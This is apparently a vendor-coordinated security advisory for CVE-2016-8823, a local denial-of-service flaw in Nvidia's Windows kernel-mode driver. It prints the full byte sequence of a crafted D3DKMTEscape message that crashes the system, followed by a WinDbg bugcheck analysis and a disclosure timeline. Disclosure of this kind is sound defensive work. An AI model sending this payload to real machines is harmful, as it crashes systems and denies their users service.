Nvidia Windows Kernel Mode Driver Denial Of Service(CVE-2016-8823)

### Summary An local denial of service vulnerability exists in the communication functionality of Nvidia Windows Kernel Mode Driver. A specially crafted message can cause a vulnerability resulting in a machine crash (BSOD). An attacker can send a specific message to trigger this vulnerability. ### Tested Versions (Requires physical machine) - Nvidia Windows Kernel Mode Driver, 372.70 (21.21.13.7270) - Nvidia Windows Kernel Mode Driver, 372.90 (21.21.13.7290) ### Product URLs http://nvidia.com ### CVSSv3 Score 5.5 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H ### Details An local denial of service vulnerability exists in the communication functionality of Nvidia Windows Kernel Mode Driver. A specially crafted D3DKMTEscape message can cause a vulnerability resulting in a machine crash (BSOD). An attacker can send a specific message to trigger this vulnerability. ``` 0x41, 0x44, 0x56, 0x4E, 0x02, 0x00, 0x01, 0x00, 0x40, 0x01, 0x00, 0x00, 0x2A, 0x2A, 0x56, 0x4E, 0x03, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x4E, 0x00, 0x56, 0x00, 0x53, 0x00, 0x50, 0x00, 0x43, 0x00, 0x41, 0x00, 0x50, 0x00, 0x53, 0x00, 0x5C, 0x00, 0x61, 0x00, 0x61, 0x00, 0x31, 0x00, 0x38, 0x00, 0x65, 0x00, 0x62, 0x00, 0x63, 0x00, 0x34, 0x00, 0x2D, 0x00, 0x30, 0x00, 0x31, 0x00, 0x39, 0x00, 0x64, 0x00, 0x2D, 0x00, 0x34, 0x00, 0x65, 0x00, 0x63, 0x00, 0x30, 0x00, 0x2D, 0x00, 0x62, 0x00, 0x66, 0x00, 0x31, 0x00, 0x64, 0x00, 0x2D, 0x00, 0x64, 0x00, 0x36, 0x00, 0x33, 0x00, 0x30, 0x00, 0x30, 0x00, 0x32, 0x00, 0x31, 0x00, 0x38, 0x00, 0x62, 0x00, 0x66, 0x00, 0x35, 0x00, 0x32, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9F, 0x21, 0x93, 0x00, 0x32, 0xE1, 0x54, 0x00, 0x00, 0x80, 0x84, 0x1E, 0x00 ``` This bug happens because the ZwSetValueKey API is executed by the Nvidia driver with an invalid argument. ### Crash Information ``` 0: kd> !analyze -v ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except, it must be protected by a Probe. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: ffffd00026a46000, memory referenced. Arg2: 0000000000000000, value 0 = read operation, 1 = write operation. Arg3: fffff801b0bcfc20, If non-zero, the instruction address which referenced the bad memory address. Arg4: 0000000000000000, (reserved) Debugging Details: ------------------ READ_ADDRESS: ffffd00026a46000 FAULTING_IP: nt!memcpy+a0 fffff801`b0bcfc20 f30f6f040a movdqu xmm0,xmmword ptr [rdx+rcx] MM_INTERNAL_CODE: 0 DEFAULT_BUCKET_ID: WIN8_DRIVER_FAULT BUGCHECK_STR: AV PROCESS_NAME: intel1.exe CURRENT_IRQL: 0 ANALYSIS_VERSION: 6.3.9600.17298 (debuggers(dbg).141024-1500) amd64fre TRAP_FRAME: ffffd00026a44670 -- (.trap 0xffffd00026a44670) NOTE: The trap frame does not contain all registers. Some register values may be zeroed or incorrect. rax=0000000000000000 rbx=0000000000000000 rcx=ffffc001f8688670 rdx=00000ffe2e3bd988 rsi=0000000000000000 rdi=0000000000000000 rip=fffff801b0bcfc20 rsp=ffffd00026a44808 rbp=00000000000054e1 r8=000000000000000c r9=00000000000001cc r10=ffffe00152d2ae68 r11=ffffc001f8688024 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei pl nz na po nc nt!memcpy+0xa0: fffff801`b0bcfc20 f30f6f040a movdqu xmm0,xmmword ptr [rdx+rcx] ds:ffffd000`26a45ff8=???????????????????????????????? Resetting default scope LAST_CONTROL_TRANSFER: from fffff801b0bde42c to fffff801b0bc33a0 STACK_TEXT: ffffd000`26a44408 fffff801`b0bde42c : 00000000`00000050 ffffd000`26a46000 00000000`00000000 ffffd000`26a44670 : nt!KeBugCheckEx ffffd000`26a44410 fffff801`b0af2d09 : 00000000`00000000 ffffe001`5c91b080 ffffd000`26a44670 00000000`00000000 : nt! ?? ::FNODOBFM::`string'+0xab6c ffffd000`26a444b0 fffff801`b0bcd62f : 00000000`00000000 ffffc001`f008dfc4 00000000`00000000 00000000`00000000 : nt!MmAccessFault+0x769 ffffd000`26a44670 fffff801`b0bcfc20 : fffff801`b0f26473 ffffe001`5d517301 ffffc001`00000006 ffffc001`f008dfc4 : nt!KiPageFault+0x12f ffffd000`26a44808 fffff801`b0f26473 : ffffe001`5d517301 ffffc001`00000006 ffffc001`f008dfc4 ffffd000`26a44860 : nt!memcpy+0xa0 ffffd000`26a44810 fffff801`b0fbcd18 : ffffc001`f8688024 00000000`00000000 00000000`001e8480 ffffc001`ee828000 : nt!CmpSetValueDataNew+0x157 ffffd000`26a44860 fffff801`b0f0f588 : 01d21329`ff575fe0 ffffd000`26a44991 ffffc001`f170fa70 00000025`00000003 : nt! ?? ::NNGAKEGL::`string'+0x27928 ffffd000`26a448d0 fffff801`b0e3a977 : ffffc001`f7837b50 ffffd000`26a44a40 ffffc001`00000003 ffffd000`26a459ac : nt!CmSetValueKey+0x784 ffffd000`26a449e0 fffff801`b0bcebb3 : ffffc001`ee8763a0 ffffd000`26a44c40 00000000`00000000 fffff801`b0e9bc1e : nt!NtSetValueKey+0x55f ffffd000`26a44bb0 fffff801`b0bc7020 : fffff801`4175a51a 00000000`000054e1 ffffd000`26a44e31 ffffd000`26a459ac : nt!KiSystemServiceCopyEnd+0x13 ffffd000`26a44db8 fffff801`4175a51a : 00000000`000054e1 ffffd000`26a44e31 ffffd000`26a459ac 00000000`000054e1 : nt!KiServiceLinkage ffffd000`26a44dc0 fffff801`4175a051 : 00000000`000054e1 ffffd000`26a459ac 00000000`000054e1 00000000`000054e1 : nvlddmkm+0xb751a ffffd000`26a44e80 fffff801`417944e7 : fffff801`41759fc0 ffffd000`26a45870 ffffd000`26a450b0 00000000`00000140 : nvlddmkm+0xb7051 ffffd000`26a44f20 fffff801`41763faf : 00000000`00000000 fffff801`b0dc97e0 ffffe001`52d2a080 ffffc001`ee803000 : nvlddmkm+0xf14e7 ffffd000`26a44f70 fffff801`41f44769 : ffffd000`26a45508 ffffd000`26a450b0 ffffd000`26a45870 00000000`00000000 : nvlddmkm+0xc0faf ffffd000`26a44fb0 fffff801`41f39e24 : ffffd000`26a45448 ffffd000`26a45658 ffffe001`5d517080 fffff801`b0bcebb3 : nvlddmkm!nvDumpConfig+0x1253a1 ffffd000`26a45410 fffff801`41f44136 : ffffe001`5665a000 ffffd000`26a45519 00000000`00000000 ffffe001`56a96000 : nvlddmkm!nvDumpConfig+0x11aa5c ffffd000`26a45450 fffff801`41efb43d : ffffd000`26a45780 ffffd000`26a455e9 ffffd000`26a45780 ffffe001`5665a000 : nvlddmkm!nvDumpConfig+0x124d6e ffffd000`26a45580 fffff801`413604f8 : 00000000`00000002 ffffe001`5c825220 00000000`4e562a2a 00000000`01000003 : nvlddmkm!nvDumpConfig+0xdc075 ffffd000`26a45650 fffff801`413c5b4e : 00000000`00000000 ffffd000`26a45b80 ffffd000`26a45ad0 fffff801`41463b98 : dxgkrnl!DXGADAPTER::DdiEscape+0x48 ffffd000`26a45680 fffff960`002d41d3 : ffffe001`5a294010 ffffe001`5d517080 00000000`7f82f000 ffffe001`5a294010 : dxgkrnl!DxgkEscape+0x802 ffffd000`26a45ab0 fffff801`b0bcebb3 : ffffe001`5d517080 00000000`7f82d000 00000000`0013fdb0 00000000`00000000 : win32k!NtGdiDdDDIEscape+0x53 ffffd000`26a45b00 00000000`773d74aa : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x13 00000000`0013dfd8 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x773d74aa STACK_COMMAND: kb FOLLOWUP_IP: nvlddmkm+b751a fffff801`4175a51a 85c0 test eax,eax SYMBOL_STACK_INDEX: b SYMBOL_NAME: nvlddmkm+b751a FOLLOWUP_NAME: MachineOwner MODULE_NAME: nvlddmkm IMAGE_NAME: nvlddmkm.sys DEBUG_FLR_IMAGE_TIMESTAMP: 57bf5593 FAILURE_BUCKET_ID: AV_nvlddmkm+b751a BUCKET_ID: AV_nvlddmkm+b751a ANALYSIS_SOURCE: KM FAILURE_ID_HASH_STRING: km:av_nvlddmkm+b751a FAILURE_ID_HASH: {4bb56d14-bad0-e413-eed6-722441b0442f} Followup: MachineOwner --------- ``` ### Timeline * 2016-09-30 - Initial Discovery * 2016-10-17 - Vendor Notification * 2016-12-14 - Public Disclosure